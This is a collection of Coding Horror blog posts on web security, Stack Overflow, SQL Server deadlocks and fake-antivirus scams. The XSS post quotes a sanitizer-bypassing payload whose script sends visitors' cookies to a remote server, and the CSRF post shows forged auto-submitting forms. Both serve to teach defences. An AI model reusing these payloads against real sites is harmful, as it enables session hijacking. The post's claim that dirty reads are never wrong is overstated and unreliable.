http://www.codinghorror.com/blog/
programming and human factors - Jeff Atwood
From Coding Horror, 18 days ago,
As the web becomes more and more pervasive, so do web-based security vulnerabilities. I talked a little bit about the most common web vulnerability, cross-site scripting, in Protecting Your Cookies: HttpOnly. Although XSS is incredibly dangerous, it's a fairly straightforward exploit to understand. Do not allow users to insert arbitrary HTML on your site. The name of the XSS game is sanitizing user input. If you stick to a whitelist based approach -- only allow input that you know to be good, and immediately discard anything else -- then you're usually well on your way to solving any XSS problems you might have.
I thought we had our website vulnerabilities licked with XSS. I was wrong. Steve Sanderson explains:
Since XSS gets all the limelight, few developers pay much attention to another form of attack that's equally destructive and potentially far easier to exploit. Your application can be vulnerable to cross-site request forgery (CSRF) attacks not because you the developer did something wrong (as in, failing to encode outputs leads to XSS), but simply because of how the whole Web is designed to work. Scary!
It turns out I didn't understand how cross-site request forgery, also known as XSRF or CSRF, works. It's not complicated, necessarily, but it's more.. subtle.. than XSS.
Let's say we allow users to post images on our forum. What if one of our users posted this image?
<img src="http://foo.com/logout">
Not really an image, true, but it will force the target URL to be retrieved by any random user who happens to browse that page -- using their browser credentials! From the webserver's perspective, there is no difference whatsoever between a real user initiated browser request and the above image URL retrieval.
If our logout page was a simple HTTP GET that required no confirmation, every user who visited that page would immediately be logged out. That's XSRF in action. Not necessarily dangerous, but annoying. Not too difficult to envision much more destructive versions of this technique, is it?
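There are two obvious ways around this sort of basic XSRF attack:
1. Use an HTTP POST form submission for logout, not a simple HTTP GET.
2. Make the user confirm the logout.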
Easy fix, right? We probably should never have done either of these things in the first place. Duh!
Not so fast. Even with both of the above fixes, you are still vulnerable to XSRF attacks. Let's say I took my own advice, and converted the logout form to a HTTP POST, with a big button titled "Log Me Out" confirming the action. What's to stop a malicious user from placing a form like this on their own website ..
<body onload="document.getElementById('f').submit()">
<form id="f" action="http://foo.com/logout" method="post">
<input name="Log Me Out" value="Log Me Out" />
</form>
</body>
.. and then convincing other users to click on it?
Remember, the browser will happily act on this request, submitting this form along with all necessary cookies and credentials directly to your website. Blam. Logged out. Exactly as if they had clicked on the "Log Me Out" button themselves.
Sure, it takes a tiny bit more social engineering to convince users to visit some random web page, but it's not much. And the possibilities for attack are enormous: with XSRF, malicious users can initiate any arbitrary action they like on a target website. All they need to do is trick unwary users of your website -- who already have a validated user session cookie stored in their browser -- into clicking on their links.
So what can we do to protect our websites from these kinds of cross site request forgeries?
XmlHttpRequest function.
XmlHttpRequest calls can't read cookies. If either of the values don't match, discard the input as spoofed. The only downside to this approach is that it does require your users to have JavaScript enabled, otherwise their own form submissions will be rejected.
If your web site is vulnerable to XSRF, you're in good company. Digg, GMail, and Wikipedia have all been successfully attacked this way before.
Maybe you're already protected from XSRF. Some web frameworks provide built in protection for XSRF attacks, usually through unique form tokens. But do you know for sure? Don't make the same mistake I did! Understand how XSRF works and ensure you're protected before it becomes a problem.
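To make the "unique form tokens" idea concrete, here is a minimal sketch in Python. It is not any particular framework's API: the names `SERVER_SECRET`, `issue_form_token`, and `is_valid_form_token` are hypothetical, and it assumes the server already has a session identifier for the logged-in user. The server embeds the token in a hidden field of every form it renders, then rejects any POST whose token does not match the one derived from the session.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret; a real application would load it from
# configuration rather than regenerate it on every start.
SERVER_SECRET = secrets.token_bytes(32)


def issue_form_token(session_id: str) -> str:
    """Derive a per-session token to place in a hidden form field."""
    digest = hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256)
    return digest.hexdigest()


def is_valid_form_token(session_id: str, submitted_token: str) -> bool:
    """Accept a form post only if its token matches the session's token."""
    expected = issue_form_token(session_id)
    # compare_digest takes the same time whether or not the values match.
    return hmac.compare_digest(expected.encode("utf-8"),
                               submitted_token.encode("utf-8"))


token = issue_form_token("session-abc")
print(is_valid_form_token("session-abc", token))  # genuine form post
print(is_valid_form_token("session-abc", ""))     # forged post, no token
```

The forged form from the attacker's page fails the check because the attacker's site cannot read the token out of a page served by your domain.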
From Coding Horror, 22 days ago,
By now I'm sure you've at least heard of, if not already seen, the new Windows Vista advertisements featuring Bill Gates and Jerry Seinfeld. They haven't been well received, to put it mildly, but the latest commercial is actually not bad in its longer 4 minute version:
On the whole, I'd call these ads opaque bordering on inane. Rumor has it the entire thing has been cancelled. It wasn't entirely unsuccessful, I suppose; the goal of advertising is to get people talking about it. Even if every one of those conversations starts with "what the hell were they thinking", hey -- it's a conversation. About an ad. The ad agencies have won.
I guess Microsoft figured it had to do something to counter the long running "I'm a Mac, I'm a PC" ads from Apple. I secretly love these ads, because the hidden subtext is that if you use a PC, you're as cool as John Hodgman:
My problem with these ads begins with the casting. As the Mac character, Justin Long (who was in the forgettable movie Dodgeball and the forgettabler TV show Ed) is just the sort of unshaven, hoodie-wearing, hands-in-pockets hipster we've always imagined when picturing a Mac enthusiast. He's perfect. Too perfect. It's like Apple is parodying its own image while also cementing it. If the idea was to reach out to new types of consumers (the kind who aren't already evangelizing for Macs), they ought to have used a different type of actor.
Meanwhile, the PC is played by John Hodgman -- contributor to The Daily Show and This American Life, host of an amusing lecture series, and all-around dry-wit extraordinaire. Even as he plays the chump in these Apple spots, his humor and likability are evident. (Look at that hilariously perfect pratfall he pulls off in the spot titled "Viruses.") The ads pose a seemingly obvious question -- would you rather be the laid-back young dude or the portly old dweeb? -- but I found myself consistently giving the "wrong" answer: I'd much sooner associate myself with Hodgman than with Long.
The sleight of hand breaks down a bit when you realize that Hodgman actually uses Macs, but that's advertising for you: a giant pack of lies. In other breaking news, water still wet, sky still blue.
The reason I bring this up is not to fan the eternal flame of platform wars, but to highlight one interesting little detail in the ad. At about 1:05, you'll see Gates reading a bedtime story to the family's son from some obscure technical tome or other. But not just any technical tome -- he's reading from the book that this very blog is named after, my all-time favorite programming book, Steve McConnell's Code Complete.
You can use [the table driven method] approach in any object-oriented language. It's less error-prone, more maintainable and more efficient than lengthy if statements, case statements or copious subclasses. The fact that a design uses inheritance and polymorphism doesn't make it a good design. The rote object-oriented design described earlier in the "Object-Oriented Approach" section would require as much code as a rote functional design -- or more.
The above is excerpted from Chapter 18, "Table-Driven Methods", on page 423. You might argue that I have an unhealthy fascination with Steve McConnell and Code Complete. You wouldn't be wrong.
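For anyone who hasn't met the technique, here is a small sketch of what "table driven" means, written in Python. The example and its names (`DAYS_IN_MONTH`, `days_in_month`) are my own illustration rather than a listing from the book, and it ignores leap years to stay short. The first function encodes the logic in branches; the second moves the same knowledge into a table and replaces the branches with a lookup.

```python
def days_in_month_branching(month: int) -> int:
    """Rote approach: the logic lives in a chain of conditionals."""
    if month == 2:
        return 28
    elif month in (4, 6, 9, 11):
        return 30
    else:
        return 31


# Table-driven approach: the logic lives in data, indexed by month - 1.
DAYS_IN_MONTH = (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31)


def days_in_month(month: int) -> int:
    """Look the answer up instead of branching (leap years ignored)."""
    return DAYS_IN_MONTH[month - 1]


print(days_in_month(2))   # 28
print(days_in_month(12))  # 31
```

Changing the rules now means editing a row of data instead of rewriting control flow, which is the maintainability argument the excerpt is making.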
I'm probably preaching to the choir here, but I doubt it's a coincidence that Gates chose that particular book; I'm sure it's one of his all time favorite books, too.
Hat tip to Matthew Eckstein for pointing this one out!
From Coding Horror, 25 days ago,
I'm in no way trying to conflate this with the meaning of my last blog post, but after a six month gestation, we just gave birth to a public website.
Of course, I'm making a sly little joke here about community, but I really believe in this stuff. Stack Overflow is, as much as I could make it, an effort of collective programmer community.
Here's the original vision statement for Stack Overflow from back in April:
So what is stackoverflow?
From day one, my blog has been about putting helpful information out into the world. I never had any particular aspirations for this blog to become what it is today; I'm humbled and gratified by its amazing success. It has quite literally changed my life. Blogs are fantastic resources, but as much as I might encourage my fellow programmers to blog, not everyone has the time or inclination to start a blog. There's far too much great programming information trapped in forums, buried in online help, or hidden away in books that nobody buys any more. We'd like to unlock all that. Let's create something that makes it easy to participate, and put it online in a form that is trivially easy to find.
Are you familiar with the movie pitch formula?
Stackoverflow is sort of like the anti-experts-exchange (minus the nausea-inducing sleaze and quasi-legal search engine gaming) meets wikipedia meets programming reddit. It is by programmers, for programmers, with the ultimate intent of collectively increasing the sum total of good programming knowledge in the world. No matter what programming language you use, or what operating system you call home. Better programming is our goal.
Although reaction has generally been positive, there has been a bit of backlash. Some have promoted the idea that Stack Overflow will only contribute to the increasing dumbenation of the world's developers. I think this is, in a word, horsecrap. I liked Joel's response to this in podcast 21 (mp3):
And it is true that we are all, as developers, hopelessly incompetent. The goal of a site like Stack Overflow is to somehow share the correct knowledge wherever it may be as it is scattered throughout the universe, and to cause that to be voted up and to be spread amongst us. There's this big universe of dumb programmers, and I'm one of them, and we all have a little bit of knowledge. I may know how to do this thing in VB6 which may be useful to somebody one day who's trying to maintain some ridiculously old piece of crap code. We all have these little tiny pieces of information and if we can just contribute a little bit, that information gets amplified, and maybe a thousand other dumb developers will benefit from my one little piece of good information.
And here's my response, from the same podcast episode, to all those who turn up their noses at community sites like this, preferring the input of "experts":
The idea that you have all these experts waiting in the wings to do stuff is an illusion in my experience. There's really just a bunch of amateurs muddling along trying to do things together. The people that are truly experts are too busy to even help, right? And if the experts are too busy to help, what difference does it really make if there are experts at all. Because the whole point of this endeavor is helping other developers, and whether you're an expert or not, if you have no time to help, you're not really contributing to the solution.
Stack Overflow is by no means done. We're still technically in public beta. But I believe what we have -- the confluence of wiki, discussion, blog, and reddit/digg ranking systems -- is a fair representation of our original vision for Stack Overflow.
It's a place where a busy programmer can invest a few minutes with as little friction as possible, and get something tangible from the community in return.
But who cares what I think; my opinion holds no particular weight. I'm just a member. This is our site. You tell me: how dumb are we?
From Coding Horror, 1 month ago,
I don't usually talk about my personal life here, but I have to make an exception in this case.
I debated for days which geeky reference I would use as a synonym for "we're having a baby". The title is the best I could do. I'm truly sorry.
As an aside, this is something my wife and I have worked at for a number of years, and was only truly possible through the Miracle of Science™. Despite the best of intentions, you really start to resent all those teenage couples who manage to get pregnant so awkwardly and accidentally. Oh, that's right! You have sex! It's so obvious in retrospect!
Not that managing to procreate is anything special compared to programming. Just ask the inestimable Richard Stallman:
It doesn't take special talents to reproduce -- even plants can do it. On the other hand, contributing to a program like Emacs takes real skill. That is really something to be proud of.
It helps more people, too.
At any rate, I'm looking forward to stocking our unborn child's mind with all my insane, crazy ideas. I think Dave Eggers said it best in A Heartbreaking Work of Staggering Genius, describing a road trip he took with his younger brother after the death of his parents:
His brain is my laboratory, my depository. Into it I can stuff the books I choose, the television shows, the movies, my opinion about elected officials, historical events, neighbors, passersby. He is my twenty-four-hour classroom, my captive audience, forced to ingest everything I deem worthwhile. He is a lucky, lucky boy! And no one can stop me. He is mine, and you cannot stop me, cannot stop us. Try to stop us, you pu**y! You can't stop us from singing, and you can't stop us from making fart sounds, from putting our hands out the window to test the aerodynamics of different hand formations, from wiping the contents of our noses under the front of our seats.
We cannot be stopped from looking with pity upon all the world's sorry inhabitants, they unblessed by our charms, unchallenged by our trials, unscarred and thus weak, gelatinous. You cannot stop me from telling Toph to make comments about and faces at the people in the next lane.
It's unfair. The matchups, Us. v. Them (or you) are unfair. We are dangerous. We are daring and immortal. Fog whips up from under the cliffs and billows over the highway. Blue breaks from beyond the fog and sun suddenly screams from the blue.
I guess what I'm trying to say is that, with any luck, he or she will be scarred for life. That's a proud family tradition where I come from.
From Coding Horror, 1 month ago,
So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
&lt;script&gt;alert('hello XSS!');&lt;/script&gt;
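As a rough illustration of that encoding step, here is how it looks with `html.escape` from the Python standard library. This is only a sketch of the general idea, not the encoder the site in this story used. Note that `html.escape` also encodes quote characters by default, so its output is slightly more aggressive than encoding the angle brackets alone.

```python
import html

user_input = "<script>alert('hello XSS!');</script>"

# Replace the characters HTML treats as markup with character references,
# so the browser displays the text instead of executing it.
encoded = html.escape(user_input)

print(encoded)
# &lt;script&gt;alert(&#x27;hello XSS!&#x27;);&lt;/script&gt;
```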
In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;
That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a browser which isn't exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838
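The response above came from ASP.NET, but the flag is just an attribute on the Set-Cookie header, so any server stack can emit it. As a hedged sketch, here is one way to build such a header with `http.cookies.SimpleCookie` from the Python standard library. The cookie name `session_id` is a made-up example, and the value is borrowed from the session cookie shown above.

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["session_id"] = "ig2fac55"      # hypothetical cookie name
cookie["session_id"]["path"] = "/"
cookie["session_id"]["httponly"] = True  # ask the browser to hide it from script

# Render the Set-Cookie header line a server would send to the browser.
header = cookie.output()
print(header)
```

The printed line carries the HttpOnly attribute alongside the path, which is all the browser needs to keep the cookie away from `document.cookie`.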
This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here's what we know:
HttpOnly blocks access to the cookie through document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari).
HttpOnly removes the cookie from the headers returned by XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
From Coding Horror, 1 month ago,
You may have noticed that my posting frequency has declined over the last three weeks. That's because I've been busy building that Stack Overflow thing we talked about.
It's going well so far. Joel Spolsky also seems to think it's going well, but he's one of the founders so he's clearly biased. For what it's worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn't contacted him in any way; I myself only found out about his reaction third hand.
That's not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:
Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.
Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.
Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?
Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock -- everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.
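The puzzle is easy to play with in code. Below is a small Python sketch using threads as philosophers and `threading.Lock` objects as chopsticks. It uses one classic way out, which is to make everyone acquire locks in the same global order. That is a general technique for application code, not a description of how SQL Server handles deadlocks, and every name here (`dine`, `run_dinner`, the constants) is invented for the illustration.

```python
import threading

NUM_PHILOSOPHERS = 5
MEALS_EACH = 100


def dine(seat: int, chopsticks: list, meals_eaten: list) -> None:
    """Eat MEALS_EACH times, taking both neighbouring chopsticks each time."""
    left = seat
    right = (seat + 1) % NUM_PHILOSOPHERS
    # Always pick up the lower-numbered chopstick first. With one global
    # ordering, a circular chain of waiting philosophers cannot form.
    first, second = sorted((left, right))
    for _ in range(MEALS_EACH):
        with chopsticks[first]:
            with chopsticks[second]:
                meals_eaten[seat] += 1  # only this thread writes this slot


def run_dinner() -> list:
    """Seat all philosophers, wait for them to finish, return meal counts."""
    chopsticks = [threading.Lock() for _ in range(NUM_PHILOSOPHERS)]
    meals_eaten = [0] * NUM_PHILOSOPHERS
    threads = [
        threading.Thread(target=dine, args=(seat, chopsticks, meals_eaten))
        for seat in range(NUM_PHILOSOPHERS)
    ]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return meals_eaten


print(run_dinner())
```

If each philosopher instead grabbed the left chopstick first and then the right, all five could end up holding one chopstick and waiting forever on the next, which is the deadlock the puzzle describes.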
You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:
UPDATE [Posts]
SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3
WHERE [Id] = @p0
If it detects a deadlock, SQL Server forces one of the deadlocking commands to lose -- specifically the one that uses the least resources. The statement on the losing side varied, but in our case the losing deadlock statement was always a really innocuous database read, like so:
SELECT * FROM [Posts] WHERE [ParentId] = @p0
(Disclaimer: above SQL is simplified for the purpose of this post). This deadlock perplexed me, on a couple levels.
If you aren't eating -- modifying data -- then how can trivial super-fast reads be blocked on rare writes? We've had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I'm deeply uncomfortable with errors I don't fully understand. This is the kind of stuff that quite literally keeps me up at night.
I'll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it's certainly possible. We racked our brains and our code, and couldn't come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain't rocket surgery.
If you ever have to troubleshoot database deadlocks, you'll inevitably discover the NOLOCK table hint. It works like this:
SELECT * FROM [Posts] with (nolock) WHERE [ParentId] = @p0
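The nolock hint itself is SQL Server syntax, but the idea behind it isn't unique to SQL Server: read uncommitted is one of the standard SQL isolation levels, and MySQL offers it too. The hint makes the query read that table at the read uncommitted isolation level, also known as "dirty reads". It tells the query to use the lowest possible levels of locking.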
But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You'll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It's true: the theory is scary. But here's what I think:
In theory there is no difference between theory and practice. In practice there is.
I would never recommend using nolock as a general "good for what ails you" snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.
But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they've never seen any adverse reaction when using nolock. As long as you know what you're doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!
With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it's never wrong or garbled or corrupted in a way that will crash you. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?
Adding nolock to every single one of our queries wasn't really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.
I'm no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:
The database philosophically expects there will be many data conflicts; with multiple sessions all trying to change the same data at the same time and corruption will result. To avoid this, Locks are put in place to guard data integrity ... there are a few instances though, when this pessimistic heavy lock design is more of a negative than a positive benefit, such as applications that have very heavy read activity with light writes.
Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we're building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:
Snapshots rely on an entirely new data change tracking method ... more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.
I'm a little disappointed that SQL Server treats our silly little web app like it's a banking application. I think it's incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySql deadlocks. I'm guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.
I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it's easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can't help thinking our particular database vendor just isn't as optimistic as they perhaps should be.
From Coding Horror, 1 month ago,
I consider this the golden rule of source control:
Check in early, check in often.
Developers who work for long periods -- and by long I mean more than a day -- without checking anything into source control are setting themselves up for some serious integration headaches down the line. Damon Poole concurs:
Developers often put off checking in. They put it off because they don't want to affect other people too early and they don't want to get blamed for breaking the build. But this leads to other problems such as losing work or not being able to go back to previous versions.
My rule of thumb is "check-in early and often", but with the caveat that you have access to private versioning. If a check-in is immediately visible to other users, then you run the risk of introducing immature changes and/or breaking the build.
I'd much rather have small fragments checked in periodically than to go long periods with no idea whatsoever what my coworkers are writing. As far as I'm concerned, if the code isn't checked into source control, it doesn't exist. I suppose this is yet another form of Don't Go Dark; the code is invisible until it exists in the repository in some form.
I'm not proposing developers check in broken code -- but I also argue that there's a big difference between broken code and incomplete code. Isn't it possible, perhaps even desirable, to write your code and structure your source control tree in such a way that you can check your code in periodically as you're building it? I'd much rather have empty stubs and basic API skeletons in place than nothing at all. I can integrate my code against stubs. I can do code review on stubs. I can even help you build out the stubs!
But when there's nothing in source control for days or weeks, and then a giant dollop of code is suddenly dropped on the team's doorstep -- none of that is possible.
Developers that wouldn't even consider adopting the old-school waterfall method of software development somehow have no problem adopting essentially the very same model when it comes to their source control habits.
Perhaps what we need is a model of software accretion. Start with a tiny fragment of code that does almost nothing. Look on the bright side -- code that does nothing can't have many bugs! Test it, and check it in. Add one more small feature. Test that feature, and check it in. Add another small feature. Test that, and check it in. Daily. Hourly, even. You always have functional software. It may not do much, but it runs. And with every checkin it becomes infinitesimally more functional.
If you learn to check in early and check in often, you'll have ample time for feedback, integration, and review along the way. And who knows -- you might even manage to accrete that pearl of final code that you were looking for, too.
From Coding Horror, 1 month ago,
0 comments
As a software developer, tell me if you've ever done this:
And let's not forget the common goating technique where you take a screenshot of someone's desktop, make it the desktop background, then proceed to hide every UI element on the screen. The anguished cries as users desperately double-triple-quadruple click on pixels that look exactly like real user interfaces can typically be heard for miles.
I bring this up to generate some sympathy. I get fooled by my own FUI -- Fake User Interface -- at least once a month. If it can happen to us, it can happen to anyone. Which means FUI can be quite dangerous in the wrong hands. Consider Ryan Meray's story:
Okay, so here's an interesting one. My girlfriend is researching stuff on lilies, so she's trying to find the website for the Michigan Regional Lily Society. The website address is http://www.mrls.org/
Feel free to browse there directly, there's nothing wrong with it. But if you don't remember the URL, your first response is to Google it. We google and get this:
http://www.google.com/search?q=Michigan+Regional+Lily+Society
Now, if you're in Firefox, everything is fine. You click that first result, and you get to their website, and you learn about lilies.
However, if you are using IE, be aware, you are about to have a Spyware/Virus alert.
Obviously, the poor Michigan Regional Lily Society has fallen prey to website hackers. (Note that it may have been fixed by the time I'm writing this -- but I duplicated everything I'm about to show you.)
The first clever point is that the website appears fine if you navigate there directly. The malicious JavaScript code inserted into the page checks the referer and does something different if you arrive there via a web search engine. This means the people who own the website, and never arrive there through Google, would be scratching their heads, wondering what all the fuss is about. So the hack survives longer.
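For site owners trying to reproduce a report like this, it helps to see how little logic such a check needs. Below is a minimal sketch in Python, not the actual injected script (which was JavaScript and is not shown here). The function name and the list of search domains are assumptions made for illustration.

```python
from urllib.parse import urlparse

# Assumed list of search engine domains, for illustration only.
SEARCH_DOMAINS = ("google.com", "yahoo.com", "live.com")


def arrived_via_search(referrer: str) -> bool:
    """Return True if the referrer's host is a listed search domain or a subdomain of one."""
    host = urlparse(referrer).hostname or ""
    return any(host == d or host.endswith("." + d) for d in SEARCH_DOMAINS)
```

A direct visit sends no referrer, so a check like this reports False and the page behaves normally. That is why an owner testing their own site should also load it by clicking through from a search result.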
But if you do arrive at the MRLS site through a search engine, like a huge percentage of the world does, you're redirected to:
http://scanner.antivir64.com/?aff=1050
The very first thing this page does is minimize the browser (Firefox 3, in this case) and present us with this JavaScript alert:
I'm intentionally juxtaposing the browser and the dialog here, but the browser is way off in the very lower right corner of the display and that dialog is smack dab in the middle of the screen. It is not at all clear that the dialog originated from that web page. It's a primitive technique, but it is surprisingly effective.
I didn't have the guts to click OK on that dialog; I clicked the close button. The browser then expanded to show this convincing "real time virus scan".
The static screenshot does not do it justice; the scrollbar moves, the list of files flies by as they are "scanned", and the web page rather successfully simulates an ersatz UI somewhere between Windows XP and Windows Vista. Of course, we know this Fake User Interface is completely invalid, because it is running in the browser, not on our PC. You and I may understand that distinction, but what about your parents? Your wife? Your children? Your less technically savvy friends? Will they understand this scary, authentic looking virus warning coming from an "encrypted secure site" is all a lie?
Honestly, whose PC doesn't "run slower than normal"? Maybe I would want to know if my computer is infected with Viruses, Adware or Spyware. It's all part of the culture of fear that security software companies -- and let's be honest, Windows security software companies -- cultivate so they can rake in millions of dollars per year hawking their software. The difference here, of course, is that it's increasingly difficult to tell the good guys from the bad guys. That's the downside of fear as a selling point: it cuts equally well in both directions.
Woe betide the poor user who is convinced through the trickery of FUI to install this "antivirus" software. The page does its darndest to convince you to run its payload executable. Any click on the page, no matter where, is interpreted as a download request.
The page also attempts a drive-by download, though those have been auto-blocked for years now.
It's tempting to put this down as yet another iteration of phishing, the forever hack. To be fair, this is exactly the sort of thing web browser phishing filters were designed to prevent. This site was already in the Firefox 3 phishing filter -- but it was not caught by the Internet Explorer 7 phishing filter, so I reported it.
I am all for phishing filters as another important line of defense, but like all distributed blacklists, they're only so effective.
What I'm more concerned about here is how well the user interface was spoofed. The browser FUI was convincing enough to even make me -- possibly the world's most jaded and cynical Windows user -- do a bit of a double-take. How do you protect naive users from cleverly designed FUI exploits like this one? Can you imagine your mother doing a web search on flowers -- flowers, for God's sake -- clicking on the search results to a totally legitimate website, and correctly navigating the resulting maze of fake UI, spurious javascript alerts, and download dialogs?
I know I can't. As much as I admire distributed phishing blacklist efforts, there's no way they can possibly keep pace with the rapid setup and teardown of hacked websites. How many compromised websites are out there? How many unsophisticated users surf the internet every day?
As always, we can lay a big part of the blame at Microsoft's doorstep for not adopting the UNIX policy of non-administrator accounts for regular users. But then again, if the spoofing is good enough, the FUI extra-convincing, even a Linux or OS X user could be coerced into entering their admin password for a "system security scan". Or maybe they just wanted to see the dancing bunnies.
And then, like Ryan, you're likely to end up with the same infected computer, and the same distraught spouse. All this for the love of a few lilies.
Short of user education, which is a neverending, continuous uphill battle -- how would you combat a perfectly spoofed FUI presented to a naive user?
From Coding Horror, 1 month ago,
0 comments
One of the early technology decisions we made on Stack Overflow was to go with a fairly JavaScript intensive site. Like many programmers, I've been historically ambivalent about JavaScript:
However, it's difficult to argue with the demonstrated success of JavaScript over the last few years. JavaScript code has gone from being a peculiar website oddity to -- dare I say it -- delivering useful core features on websites I visit on a daily basis. Paul Graham had this to say on the definition of Web 2.0 in 2005:
